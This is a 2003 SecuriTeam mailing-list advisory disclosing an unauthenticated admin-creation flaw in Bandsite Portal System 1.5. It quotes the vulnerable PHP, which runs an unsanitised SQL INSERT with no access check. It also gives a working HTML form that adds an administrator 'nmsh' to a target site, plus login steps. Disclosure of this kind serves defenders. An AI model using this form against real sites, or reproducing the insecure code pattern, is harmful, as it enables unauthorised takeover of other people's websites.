[UNIX] Vulnerability in Bandsite Allows Gaining Admin Access

From: SecuriTeam (support_at_securiteam.com)
Date: 09/16/03

  • Next message: SecuriTeam: "[TOOL] Gspoof - a TCP/IP Packet Generator" 
    To: list@securiteam.com
Date: 16 Sep 2003 17:15:50 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Vulnerability in Bandsite Allows Gaining Admin Access
    ------------------------------------------------------------------------

    SUMMARY

     <http://membres.lycos.fr/fluxx/bandwebsite.php> Bandsite is "an online
    portal system designed for Bands. Features: themes support, news posting,
    audio sections, guestbook, tour guide, an admin section to manage overall
    data and configurations, and more".

    A vulnerability in the product allows remote attackers to insert a new
    administrator account without requiring any special privileges.

    DETAILS

    Vulnerable systems:
     * Bandsite Portal System version 1.5

    Vulnerable code:
    switch ($section) {
    [...]
        case admins:
    if ($submit){
          $query = "INSERT INTO admin (name,pass,level) VALUES
    ('$name','$pass','1')";
          mysql_query($query) or die ("query failed");
          echo"The admin has been added!<br><a
    href=admin.php?section=admins>Back</a><br>";

    As you can see by simply sending a request using the following HTML:
    < form
    action=http://[target]/bandwebsite/admin.php?&Login=1&section=admins
    method=post>
       Name:< br>
    < input type=text name='name' value='nmsh' size="20">< br>
       Pass:< br>
    < input type=text name='pass' value='nmsh' size="20">< br>
    < input type=submit name='submit' value='send'>< br>
    </form>

    A new administrator named nmsh will be added with the password nmsh.

    Now by going to the following URL: http://[target]/bandwebsite/login.php
    and entering as the login name nmsh and as the password nmsh,
    administrative privileges can be gained.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:nmsh_sa@yahoo.com>
    Nasser.M.Sh.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[TOOL] Gspoof - a TCP/IP Packet Generator"

    Relevant Pages